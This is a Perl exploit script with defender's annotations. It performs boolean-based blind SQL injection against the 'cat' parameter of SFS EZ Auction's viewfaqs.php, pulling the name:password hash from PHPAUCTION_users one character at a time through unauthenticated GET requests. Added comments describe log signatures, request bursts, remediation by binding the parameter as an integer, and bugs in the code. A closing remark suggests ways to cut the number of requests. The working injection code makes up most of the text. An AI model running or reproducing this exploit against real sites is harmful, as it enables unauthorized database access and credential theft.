SFS Auction Blind sql injection Exploit Code:
#!/usr/bin/perl -w
# Boolean-based blind SQL injection against the `cat` parameter of
# viewfaqs.php, driven entirely through unauthenticated GET requests.
#
# Defender's notes (everything below is visible in the code itself):
#  - Every probe lands in the web server access log as a distinct GET whose
#    query string carries the injected predicates verbatim: `and+1=0`,
#    `and+1=1`, `ascii(substring(`, `SELECT+concat_ws(`, and the table name
#    PHPAUCTION_users. Those tokens in a `cat=` value are a reliable
#    detection signature.
#  - The extraction loop sends one baseline request plus one request per
#    @charset entry (63) for each character position, back to back, with no
#    delay, against a single endpoint - a burst pattern that stands out in
#    rate-based monitoring.
#  - Root-cause remediation on the application side is to bind `cat` as an
#    integer (parameterized query or explicit cast) rather than interpolating
#    it into SQL, and to stop echoing PHP/MySQL warning text to the client:
#    the vulnerability check below keys on leaked warning strings, and the
#    extraction keys on response-length differences.
use strict;
use LWP::Simple;
$| = 1;    # autoflush STDOUT so recovered characters are printed as they arrive
print q { ::::::::::::::::::::::::::::::::::::::::::::::::::: :: SFS EZ Auction Blind sql injection exploit :: :: written by Dimi4 :: ::::::::::::::::::::::::::::::::::::::::::::::::::: [~] Greetz: [~] UASC uasc.org.ua [~] ANTICHAT forum.antichat.ru };
# Only the first argument (host plus application path) is actually used.
if (@ARGV < 1) {
    print "Usage: perl exploit.pl [url] \nExample: perl exploit.pl www.target.com/demo\n";
    exit;
}
my $page = shift;
my $uid = shift;    # read from @ARGV but never referenced again
my $prefix;         # declared but never used
# Candidate characters for the extracted string: ASCII alphanumerics plus ':',
# which is the separator produced by concat_ws(0x3a, ...) below (0x3a == ':').
# Any character outside this set can never be matched by the loop below.
my @charset = (
    'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
    'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
    '0','1','2','3','4','5','6','7','8','9',':'
);
print "[x] Vulnerability check...\n";
# Vulnerability oracle: append an always-false predicate to `cat` and look for
# leaked PHP/MySQL warning text in the response body. A server that does not
# expose warnings to clients makes this check report "patched" regardless of
# whether the query itself is injectable.
my $chreq = get("http://".$page."/viewfaqs.php?cat=1+and+1=0");
# NOTE: in m/mysql_result()/i the `()` is an empty capture group, so this
# simply matches the literal text "mysql_result".
if (($chreq =~ m/DWarning/i) || ($chreq =~ m/mysql_result()/i)) {
    print "[x] Seems to be vulnerable!\n";
} else {
    print "[o] Seems to be patched, sorry\n";
    exit;
}
print "[+] Getting hash...\n";
print "[+] Hash: ";
my $curnum = 1;
# Walks character positions 1..61 of "name:password" read from
# PHPAUCTION_users. $curnum is only advanced inside the inner loop when some
# charset character yields a response whose length differs from the baseline;
# if no candidate ever matches at a position (e.g. a character outside
# @charset, or equal-length responses), the while loop never terminates, so a
# run of this tool can show up in logs as an unbounded stream of identical
# requests against viewfaqs.php.
while($curnum < 62) {
    # Baseline "false" response for this position: ascii() can never equal -1.
    my $false_result = get("http://".$page."/viewfaqs.php?cat=1+and+1=1+and+ascii(substring(version(),".$curnum.",1))=-1");
    foreach(@charset) {
        my $ascode = ord($_);
        my $result = get("http://".$page."/viewfaqs.php?cat=1+and+1=1+and+ascii(substring((SELECT+concat_ws(0x3a,name,password)+from+PHPAUCTION_users),".$curnum.",1))=".$ascode);
        # A non-empty response whose length differs from the baseline is
        # treated as "true" for this candidate character.
        if (length($result) != 0) {
            if (length($result) != length($false_result)) {
                print chr($ascode);
                $curnum++;
            }
        }
    }
}
print "\n[+] Done!\n";
Dimi4: Слать по 63 запроса на символ — не клёво. Тем более если можно обойтись в худшем случае 6 запросами.